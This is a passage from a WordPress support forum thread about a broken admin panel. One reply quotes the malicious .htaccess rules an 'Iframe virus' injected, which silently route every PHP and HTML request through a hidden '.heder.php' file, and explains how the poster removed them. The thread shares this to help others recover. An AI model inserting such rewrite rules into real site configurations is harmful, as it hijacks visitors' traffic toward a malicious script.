• Resolved Anonymous User 3392934

    (@anonymized-3392934)


    https://www.mfimg.com/files/1186_zwint/mzakariyaWPADMIN.png

    Site: https://www.mzakariya.com
    WP Version: 2.8

    Problems:
    (*) WP-Admin is COMPLETELY messed up, and has been for several versions (see above). I’ve already tried re-uploading all the WP files.
    (*) Some plugins don’t seem to work, at all.
    —–> Askimet doesn’t seem to work at all. I have well over 3,000 spam comments, and the built-in moderation is no match.

    Any help would be appreciated. I’d rather not have to completely delete it all and reinstall.

Viewing 5 replies - 16 through 20 (of 20 total)
  • this happened to me before, but it turned to be just a DNS resolution problem with my Internet Provider.

    Because the DNS (on the ISP side) was not resolving 100%, a lot of the files (CSS probably) was not being fetched by my browser–hence, the messed up apperance.

    Can you try to access the WP-admin using a different internet provider, try to see if the problem persist. It could be that your connection is timing out, and wp-admin cannot fully load all needed files to show up it’s usual interface.

    Thanks

    Warning: gzinflate() [function.gzinflate]: data error in /catastrophicproductions.com/squint/wp-includes/http.php on line 1788

    Warning: gzuncompress() [function.gzuncompress]: data error in /catastrophicproductions.com/squint/wp-includes/http.php on line 1793

    Does this mean anything? It started popping up at the top of my admin page.

    Nothing?

    My all 3 websites messed up becouse of stupid Iframe virus. After I re-upload wp files, I saw my admin panel was still not looking normal. In fact It just looked like jmillgraphics’s admin panel.I tried to enter to admin panel with another browser. It worked but I coundn’t see or edit page, or files. I was getting “no pages found” or “no posts found” message.

    Later I found out that Iframe injected .htaccess file and create new ones to use a file called “.heder.php”. If I delete it my website was failing with “500 Internal Server Error”. So I found all the .htaccess files on the server deleted the injected code (from #mmmmd to </IfModule>) everything worked fine.

    Here is the infected .htaccess file code;

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    #mmmmd
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} GET
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} !.heder.php
    RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml)	\.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
    </IfModule>

    Hope it helps and nobody suffers from Iframe…

Viewing 5 replies - 16 through 20 (of 20 total)
  • The topic ‘Blog Admin is completely messed up’ is closed to new replies.